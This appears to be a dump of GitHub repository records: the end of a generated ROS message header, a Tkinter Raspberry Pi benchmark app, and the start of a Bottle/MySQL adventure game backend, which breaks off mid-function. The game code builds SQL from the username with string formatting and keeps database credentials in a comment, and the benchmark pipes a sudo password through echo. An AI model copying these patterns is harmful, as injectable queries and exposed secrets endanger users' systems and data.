typedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct ThrottleGearStatus_\n\ntypedef ::zfmsg::ThrottleGearStatus_<std::allocator<void> > ThrottleGearStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus > ThrottleGearStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus const> ThrottleGearStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::ThrottleGearStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"ea7e7f7f909809e23589ebec1a82490c\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0xea7e7f7f909809e2ULL;\n static const uint64_t static_value2 = 0x3589ebec1a82490cULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/ThrottleGearStatus\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 motorSpeed\\n\\\nfloat32 motorCurrent\\n\\\nuint8 motorBreak\\n\\\nfloat32 throttle\\n\\\nstring gear\\n\\\nstring gearLeverPosition\\n\\\nuint8 pedalBreak\\n\\\nuint8 errorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n stream.next(m.motorSpeed);\n stream.next(m.motorCurrent);\n stream.next(m.motorBreak);\n stream.next(m.throttle);\n stream.next(m.gear);\n stream.next(m.gearLeverPosition);\n stream.next(m.pedalBreak);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct ThrottleGearStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"motorSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.motorSpeed);\n s << indent << \"motorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.motorCurrent);\n s << indent << \"motorBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.motorBreak);\n s << indent << \"throttle: \";\n Printer<float>::stream(s, indent + \" \", v.throttle);\n s << indent << \"gear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gear);\n s << indent << \"gearLeverPosition: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gearLeverPosition);\n s << indent << \"pedalBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.pedalBreak);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n"
}
] | 66 |
yaroshrostyslav/RaspberryPi-benchmark | https://github.com/yaroshrostyslav/RaspberryPi-benchmark | 9bbf727f19da8eda975718a8634e54be9019f544 | 0d5e54738e6c9454bb55d477fe8a120477fe0e3f | bb2f642f12c4faa9cd5d012986d55bed43576272 | refs/heads/main | 2023-03-09T16:17:30.747222 | 2021-02-25T16:22:40 | 2021-02-25T16:22:40 | 342,285,730 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5633891224861145,
"alphanum_fraction": 0.6068810224533081,
"avg_line_length": 37.519325256347656,
"blob_id": "45c62a0a2c11dc03d3e065446263819553de1da6",
"content_id": "38508d85d8332cf3ede83400dd5d370c100a4611",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15958,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 414,
"path": "/bench.py",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "from decimal import *\nfrom tkinter import *\nimport tkinter.ttk as ttk\nimport time\nimport shutil\nimport zipfile\n# for get machine info\nimport sys, os, platform, subprocess\nsys.path.append(\"packages/\")\nimport cpuinfo\nfrom cpuinfo import get_cpu_info\nfrom threading import Thread\n\n#config\nRUN_TIME = 60;\n\ndefault_b1 = 626;\ndefault_b2 = 19550516;\ndefault_b3 = 7214769;\ndefault_b4 = 33477349;\ndefault_b5 = 4867;\n\nk_1 = Decimal(1) / Decimal(default_b1);\nk_2 = Decimal(0.3) / Decimal(default_b2);\nk_3 = Decimal(5) / Decimal(default_b3);\nk_4 = Decimal(3) / Decimal(default_b4);\nk_5 = Decimal(0.7) / Decimal(default_b5);\n\nres_1 = 0;\nres_2 = 0;\nres_3 = 0;\nres_4 = 0;\nres_5 = 0;\n\nsudo_password = '';\n\n#1\ndef copy_files():\n time.sleep(1)\n start_time_left.place(relx=0.5, rely=0.60, anchor=CENTER);\n start_logs.insert(3.0, 'Running test 1 - Flash memory write\\n')\n start_title.config(text='Test 1 of 5: Flash memory write');\n start_progress.stop();\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n shutil.copyfile(r'files/image.jpg', r'temp/image.jpg');\n if (time.time() >= time_end):\n global res_1\n res_1 = count;\n res = res_1 * k_1;\n start_logs.insert(4.0, \"Result test 1 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=find_hash).start();\n return count;\n\n#2\ndef find_hash():\n file = 'files/PRO_WPA.txt';\n start_time_left.config(text='4 minutes left');\n start_logs.insert(5.0, 'Running test 2 - RAM speed\\n')\n start_title.config(text='Test 2 of 5: RAM speed');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n with open(file, 'r') as read_file:\n for line in read_file:\n new_line = line.strip('\\n')\n count += 1;\n if (time.time() >= time_end):\n global res_2\n res_2 = count;\n res = res_2 * k_2;\n start_logs.insert(6.0, \"Result test 2 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=test_integer).start();\n return count;\n\n#3\ndef test_integer():\n start_time_left.config(text='3 minutes left');\n start_logs.insert(7.0, 'Running test 3 - Integer operations\\n')\n start_title.config(text='Test 3 of 5: Integer operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0;\n while True:\n count += 1;\n b += 22226545*22+26216*222+88**88*88;\n if (time.time() >= time_end):\n global res_3\n res_3 = count;\n res = res_3 * k_3;\n start_logs.insert(8.0, \"Result test 3 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=test_float).start();\n return count;\n\n#4\ndef test_float():\n start_time_left.config(text='2 minutes left');\n start_logs.insert(9.0, 'Running test 4 - Floating point operations\\n')\n start_title.config(text='Test 4 of 5: Floating point operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0.1;\n while True:\n count += 1;\n b += 0.01;\n if (time.time() >= time_end):\n global res_4\n res_4 = count;\n res = res_4 * k_4;\n start_logs.insert(10.0, \"Result test 4 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=create_archive).start();\n return count;\n\n#5\ndef create_archive():\n start_time_left.config(text='1 minutes left');\n start_logs.insert(11.0, 'Running test 5 - Archiving data operations\\n')\n start_title.config(text='Test 5 of 5: Archiving data operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n newzip=zipfile.ZipFile(r'temp/images.zip','w');\n newzip.write(r'files/image.jpg');\n if (time.time() >= time_end):\n global res_5\n res_5 = count;\n res = res_5 * k_5;\n start_logs.insert(12.0, \"Result test 5 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n get_result();\n return count;\n\ndef get_result():\n calc_1 = res_1 * k_1;\n calc_2 = res_2 * k_2;\n calc_3 = res_3 * k_3;\n calc_4 = res_4 * k_4;\n calc_5 = res_5 * k_5;\n result = calc_1 + calc_2 + calc_3 + calc_4 + calc_5;\n start_title.config(text=\"Result\\n\"+'%.2f' % result, anchor=CENTER, fg='#053b66', font=\"Arial 20 bold\");\n start_logs.insert(13.0, \"Result All Tests - \"+'%.2f' % result);\n start_progress.place_forget();\n start_time_left.place_forget();\n btn_end = Button(root, text=\"Ok\", width=12, height=1, font=\"Arial 14\");\n btn_end.place(relx=0.35, rely=0.69, anchor=CENTER);\n btn_other_result = Button(root, text=\"Other results\", width=12, height=1, font=\"Arial 14\");\n btn_other_result.place(relx=0.65, rely=0.69, anchor=CENTER);\n def click_btn_end(event):\n global start_progress\n start_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=350, mode='determinate', value=0);\n start_logs.place_forget();\n start_logs.delete('1.0', END);\n start_title.place_forget();\n btn_end.place_forget();\n btn_other_result.place_forget();\n btn_start_test.place(relx=0.5, rely=0.57, anchor=CENTER);\n body_info_proc.place(width=100, relx=0, rely=0.85);\n body_info_proc_value.place(relx=0.20, rely=0.85);\n body_info_os.place(width=100, relx=0, rely=0.71);\n body_info_os_value.place(relx=0.20, rely=0.71);\n body_info_user.place(width=100, relx=0, rely=0.78);\n body_info_user_value.place(relx=0.20, rely=0.78);\n body_info_temp.place(width=100, relx=0, rely=0.92);\n btn_get_tempature.place(relx=0.22, rely=0.92);\n def click_btn_other_result(event):\n b = Toplevel();\n b.title(\"Benchmark v1.0 - Other results\");\n b.configure(bg='#fff');\n window__width = 600;\n window_height = 380;\n window_x = b.winfo_screenwidth() // 2 - (window__width//2);\n window_y = b.winfo_screenheight() // 2 - (window_height//2);\n b.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n body_img_results = Label(b, image=img_results, bg='#fff');\n body_img_results.pack(expand=1);\n \n btn_end.bind(\"<ButtonRelease-1>\", click_btn_end);\n btn_other_result.bind(\"<ButtonRelease-1>\", click_btn_other_result);\n\ndef exit_program():\n root.destroy();\n\ndef about_program():\n a = Toplevel();\n a.title(\"Benchmark v1.0 - About\");\n a.configure(bg='#fff');\n window__width = 300;\n window_height = 200;\n window_x = a.winfo_screenwidth() // 2 - (window__width//2);\n window_y = a.winfo_screenheight() // 2 - (window_height//2);\n a.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n Label(a, text=\"Benchmark v1.0 for Raspberry pi \\n\\n Developer: Yarosh Rostyslav \\n\\n Copyright © 2020\", bg='#fff', font=\"Arial 11\").pack(expand=1);\n\ndef click_start(event=''):\n global alert_start\n alert_start = Toplevel();\n alert_start.title(\"Benchmark v1.0 - Start Tests\");\n alert_start.configure(bg='#fff');\n window__width = 300;\n window_height = 200;\n window_x = alert_start.winfo_screenwidth() // 2 - (window__width//2);\n window_y = alert_start.winfo_screenheight() // 2 - (window_height//2);\n alert_start.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y));\n Label(alert_start, text=\"Please close all third-party applications \\n to get an accurate result!\", bg='#fff', fg='#f00', font=\"Arial 11\").place(relx=0.5, rely=0.35, anchor=CENTER);\n btn_start = Button(alert_start, text=\"Start\", width=15, height=1, font=\"Arial 12 bold\");\n btn_start.place(relx=0.5, rely=0.70, anchor=CENTER);\n btn_start.bind(\"<ButtonRelease-1>\", click_start_test);\n\n# after click start\ndef click_start_test(event):\n alert_start.destroy();\n start_title.config(text='Loading...', fg='#000', font=\"Arial 15\");\n btn_start_test.place_forget();\n body_info_proc.place_forget();\n body_info_proc_value.place_forget();\n body_info_os.place_forget();\n body_info_os_value.place_forget();\n body_info_user.place_forget();\n body_info_user_value.place_forget();\n body_info_temp.place_forget();\n btn_get_tempature.place_forget();\n body_info_temp_value.place_forget();\n\n start_title.place(relx=0.5, rely=0.54, anchor=CENTER);\n start_progress.place(relx=0.5, rely=0.66, anchor=CENTER);\n start_progress.start(10);\n start_logs.place(relx=0.5, rely=0.90, anchor=CENTER);\n start_logs.insert(1.0, 'Loading...\\n')\n start_logs.insert(2.0, 'Starting tests...\\n')\n \n # Thread(copy_files())\n Thread(target=copy_files).start();\n\n\ndef get_tempature(event):\n os_name = platform.system();\n temp = 0;\n def save_password(event):\n global sudo_password;\n if (sudo_password == ''):\n sudo_password = body_input.get()\n root2.destroy();\n command = 'powermetrics -n 1 -i 1 --samplers smc'.split();\n cmd1 = subprocess.Popen(['echo',sudo_password], stdout=subprocess.PIPE);\n cmd2 = subprocess.Popen(['sudo','-S'] + command, stdin=cmd1.stdout, stdout=subprocess.PIPE);\n output = cmd2.stdout.read().decode();\n lst = output.split('CPU die temperature');\n lst2 = lst[1].split('CPU Plimit:');\n lst3 = lst2[0].replace(':', '').replace('\\n', '');\n temp = lst3[1:];\n global body_info_temp_value\n btn_get_tempature.place_forget();\n body_info_temp_value.config(text=temp);\n body_info_temp_value.place(relx=0.21, rely=0.92);\n \n if (os_name == \"Darwin\"):\n global sudo_password;\n if (sudo_password == ''):\n root2 = Toplevel(root)\n root2.title(\"Benchmark v1.0\");\n window__width = 250;\n window_height = 200;\n window_x = root2.winfo_screenwidth() // 2 - (window__width//2);\n window_y = root2.winfo_screenheight() // 2 - (window_height//2);\n root2.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n # root2.overrideredirect(True)\n\n body_title = Label(root2, text='Please enter admin password:', width=window__width, fg='#000', font=\"Arial 15\");\n body_input = Entry(root2, width=50);\n btn_ok = Button(root2, text=\"OK\", width=6, height=1, font=\"Arial 14\")\n\n body_title.place(x=0, y=50, width=window__width, height=20);\n body_input.place(x=15, y=88, width=window__width-30, height=25);\n btn_ok.place(x=70, y=120, width=window__width-140, height=25);\n\n btn_ok.bind(\"<ButtonRelease-1>\", save_password);\n else:\n save_password(0)\n\n elif (os_name == \"Linux\"):\n get_temp = os.popen('vcgencmd measure_temp').readline();\n temp = get_temp.replace(\"temp=\", \"\").replace('\\n', '');\n btn_get_tempature.place_forget();\n body_info_temp_value.config(text=temp);\n body_info_temp_value.place(relx=0.21, rely=0.92);\n elif (os_name == \"Windows\"):\n btn_get_tempature.place_forget();\n body_info_temp_value.place(relx=0.22, rely=0.92);\n\n\ndef get_osPlatform():\n os_name = platform.system();\n if (os_name == \"Darwin\"):\n return \"Mac OS\";\n else:\n return os_name;\n\nname_cpu = get_cpu_info()['brand_raw'].replace(' ', '');\nname_os_platform = get_osPlatform();\n\n#user name computer\npc_username = platform.uname()[1]\n\n\n# GUI\nroot = Tk();\nroot.title(\"Benchmark v1.0\");\n# root.iconbitmap('files/pi.ico');\nroot.configure(bg='#fff');\nwindow__width = 550;\nwindow_height = 450;\nwindow_x = root.winfo_screenwidth() // 2 - (window__width//2);\nwindow_y = root.winfo_screenheight() // 2 - (window_height//2);\nroot.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n\n# Menu\nmainmenu = Menu(root);\nroot.config(menu=mainmenu);\n\nactionmenu = Menu(mainmenu, tearoff=0);\nactionmenu.add_command(label=\"Start tests\", command=click_start);\nactionmenu.add_command(label=\"Exit\", command=exit_program);\n\nhelpmenu = Menu(mainmenu, tearoff=0);\nhelpmenu.add_command(label=\"About\", command=about_program);\n\nmainmenu.add_cascade(label=\"Action\", menu=actionmenu)\nmainmenu.add_cascade(label=\"Help\", menu=helpmenu)\n\n\nbody_top = Label(root, text='Benchmark for Raspberry Pi', anchor='w', justify='left', padx=10, height=2, width=window__width, fg='#fff', bg='#053b66', font=\"Arial 15\");\n\nimg_logo = PhotoImage(file='files/logo150.gif');\nbody_logo = Label(root, image=img_logo, bg='#fff');\n\nimg_results = PhotoImage(file='files/other_results.gif');\n\nbtn_start_test = Button(root, text=\"Start Tests\", width=15, height=1, font=\"Arial 15 bold\")\n\nbody_info_os = Label(root, height=1, text='OS', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_os_value = Label(root, height=1, text=name_os_platform, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_user = Label(root, height=1, text='User', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_user_value = Label(root, height=1, text=pc_username, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_proc = Label(root, height=1, text='Processor', anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_proc_value = Label(root, height=1, text=name_cpu, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_temp = Label(root, height=1, text='Tempature', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_temp_value = Label(root, height=1, text='Not supported', anchor='w', padx=6, font='Arial 15', bg='#fff');\nbtn_get_tempature = Button(root, text=\"Get\", width=6, height=1, font=\"Arial 14\");\n\n# for windows os\nif (name_os_platform == 'Windows'):\n btn_start_test.config(font='Arial 13 bold');\n body_info_os.config(font='Arial 13');\n body_info_os_value.config(font='Arial 13');\n body_info_user.config(font='Arial 13');\n body_info_user_value.config(font='Arial 13');\n body_info_proc.config(font='Arial 13');\n body_info_proc_value.config(font='Arial 13');\n body_info_temp.config(font='Arial 13');\n body_info_temp_value.config(font='Arial 13');\n btn_get_tempature.config(font='Arial 10');\n\n\n#click start\nstart_title = Label(root, text='Loading...', anchor=CENTER, height=2, width=window__width, bg='#fff', fg='#000', font=\"Arial 15\");\nstart_time_left = Label(root, text='5 minutes left', anchor=CENTER, height=1, width=window__width, bg='#fff', fg='#000', font=\"Arial 11\");\nstart_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=350, mode='determinate', value=0)\nstart_logs = Text(width=61, height=5, bg=\"#eff0f1\", fg='#333', wrap=WORD)\n\nbody_top.place(x=0, y=0);\nbody_logo.place(width=140, height=140, relx=0.5, rely=0.32, anchor=CENTER);\nbtn_start_test.place(relx=0.5, rely=0.57, anchor=CENTER);\n\nbody_info_os.place(width=110, relx=0, rely=0.71);\nbody_info_os_value.place(relx=0.21, rely=0.71);\n\nbody_info_user.place(width=110, relx=0, rely=0.78);\nbody_info_user_value.place(relx=0.21, rely=0.78);\n\nbody_info_proc.place(width=110, relx=0, rely=0.85);\nbody_info_proc_value.place(relx=0.21, rely=0.85);\n\nbody_info_temp.place(width=110, relx=0, rely=0.92);\n\nbtn_get_tempature.place(relx=0.23, rely=0.92);\n\n\n\n\nbtn_start_test.bind(\"<ButtonRelease-1>\", click_start);\nbtn_get_tempature.bind(\"<ButtonRelease-1>\", get_tempature);\n\n\nroot.mainloop();\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8230452537536621,
"alphanum_fraction": 0.8271604776382446,
"avg_line_length": 80,
"blob_id": "9e9948241113e0692e30b9a64362f43d788f0a93",
"content_id": "e2c1d677e8da8098fb4c78c3cff696ea08814444",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 225,
"num_lines": 6,
"path": "/README.md",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "# RaspberryPi-benchmark\n\nBenchmark for testing the performance of the Raspberry Pi against a reference system (Raspberry Pi 3B +) in a standard configuration. The application consists of five tests, each of which in turn takes one minute to complete.\n\nБенчмарк для тестирования производительности Raspberry Pi относительно референсной системы (Raspberry Pi 3B+) в стандартной конфигурации.\nПриложение складается из пяти тестов, из которых каждый в свою очередь выполняется одну минуту.\n"
},
{
"alpha_fraction": 0.46593615412712097,
"alphanum_fraction": 0.5326346158981323,
"avg_line_length": 19.683168411254883,
"blob_id": "751639d9b7de6b07ff6bcd85cd81413299f6a349",
"content_id": "6c40e4f397e17064136f5672313d643c2e3d4bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 101,
"path": "/bench-console.py",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "from decimal import *\nimport time\nimport shutil\nimport zipfile\n\n#config\nRUN_TIME = 60;\n\ndefault_b1 = 626;\ndefault_b2 = 19550516;\ndefault_b3 = 7214769;\ndefault_b4 = 33477349;\ndefault_b5 = 4867;\n\nk_1 = Decimal(1) / Decimal(default_b1);\nk_2 = Decimal(0.3) / Decimal(default_b2);\nk_3 = Decimal(5) / Decimal(default_b3);\nk_4 = Decimal(3) / Decimal(default_b4);\nk_5 = Decimal(0.7) / Decimal(default_b5);\n\nres_1 = 0;\nres_2 = 0;\nres_3 = 0;\nres_4 = 0;\nres_5 = 0;\n\n#1\ndef copy_files():\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n shutil.copyfile(r'files/image.jpg', r'temp/image.jpg');\n if (time.time() >= time_end):\n return count;\n\n#2\ndef find_hash(file):\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n with open(file, 'r') as read_file:\n for line in read_file:\n new_line = line.strip('\\n')\n count += 1;\n if (time.time() >= time_end):\n return count;\n\n#3\ndef test_integer():\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0;\n while True:\n count += 1;\n b += 22226545*22+26216*222+88**88*88;\n if (time.time() >= time_end):\n return count;\n\n#4\ndef test_float():\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0.1;\n while True:\n count += 1;\n b += 0.01;\n if (time.time() >= time_end):\n return count;\n\n#5\ndef create_archive():\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n newzip=zipfile.ZipFile(r'temp/images.zip','w');\n newzip.write(r'files/image.jpg');\n if (time.time() >= time_end):\n return count;\n\n\nr1 = copy_files();\nprint(r1);\nr2 = find_hash('files/PRO_WPA.txt');\nprint(r2);\nr3 = test_integer();\nprint(r3);\nr4 = test_float();\nprint(r4);\nr5 = create_archive();\nprint(r5);\n\ncalc_1 = r1 * k_1;\ncalc_2 = r2 * k_2;\ncalc_3 = r3 * k_3;\ncalc_4 = r4 * k_4;\ncalc_5 = r5 * k_5;\n\nresult = calc_1 + calc_2 + calc_3 + calc_4 + calc_5;\nprint('%.1f' % result)\n\n\n\n\n\n\n\n\n\n\n"
}
] | 3 |
HaymanLiron/adventure | https://github.com/HaymanLiron/adventure | f8b3e63c1fb5404eaeef2d45e4799e0e1bae9d04 | 05eea8ab966fd676fea9937a5572a671725d0d50 | 6da5a0b243d5d1df5d0c60069b56e1d282f05a03 | refs/heads/master | 2021-06-04T07:43:37.938240 | 2016-08-20T23:19:03 | 2016-08-20T23:19:03 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.469696968793869,
"alphanum_fraction": 0.6969696879386902,
"avg_line_length": 15.5,
"blob_id": "ef4ddccbe29c4fbb0f4a57b0021a2787c8b5e82d",
"content_id": "a43de6e43699446c33604fbdb4a571722775c6a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "bottle==0.12.9\nPyMySQL==0.7.6\nrequests==2.10.0\nvirtualenv==15.0.3\n"
},
{
"alpha_fraction": 0.5549477338790894,
"alphanum_fraction": 0.5643082857131958,
"avg_line_length": 32.434959411621094,
"blob_id": "efecb162e9e1bb79b7400e7e43053a9bab3d458d",
"content_id": "35aee70ee3e87be939e892d21e6a0c05452cf4cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8226,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 246,
"path": "/main.py",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "from bottle import route, run, template, static_file, get, post, request\nimport json\nimport pymysql\nimport os\n\n# Connect to the database\n\n# connection = pymysql.connect(host='us-cdbr-iron-east-04.cleardb.net',\n# user='bf0322fb12a331',\n# password='97028153',\n# db='heroku_19fdd981997ff6d',\n# charset='utf8',\n# cursorclass=pymysql.cursors.DictCursor)\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='adventure-3',\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor)\n\n\n@route(\"/\", method=\"GET\")\ndef index():\n return template(\"adventure.html\")\n\n\n@route(\"/addUser\", method=\"POST\")\ndef add_user():\n username = request.POST.get(\"username\")\n try:\n with connection.cursor() as cursor:\n sql = \"INSERT INTO `adventure-3`.`user` (`idusers`, `user_name`, `curr_question`, `user_coins`, `user_life`) \" \\\n \"VALUES (NULL, '{0}', '1', '100', '100');\".format(username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return json.dumps({\"question_num\": \"\",\n \"question_text\": \"\",\n \"answers\": [],\n \"image\": \"choice.jpg\"\n })\n\n\ndef user_exists(username):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM user \" \\\n \"WHERE user_name = '{0}'\".format(username)\n cursor.execute(sql)\n result = cursor.fetchone() # returns None if there was no match!\n if result:\n return True\n else:\n return False\n except Exception as e:\n print(\"hello\")\n print(\"you failed because of \" + repr(e))\n return None\n\n\n@route(\"/checkUserCredentials\", method=\"POST\")\ndef check_user_credentials():\n username = request.POST.get(\"username\")\n if user_exists(username):\n return json.dumps({\"already_exists\": 1})\n else:\n return json.dumps({\"already_exists\": 0})\n\n\n@route(\"/start\", method=\"POST\")\ndef start():\n username = request.POST.get(\"username\")\n return json.dumps({\"question_num\": \"\",\n \"question_text\": \"\",\n \"answers\": [],\n \"image\": \"choice.jpg\"\n })\n\n\ndef get_user(username):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM user WHERE user_name = '{0}'\".format(username)\n cursor.execute(sql)\n return 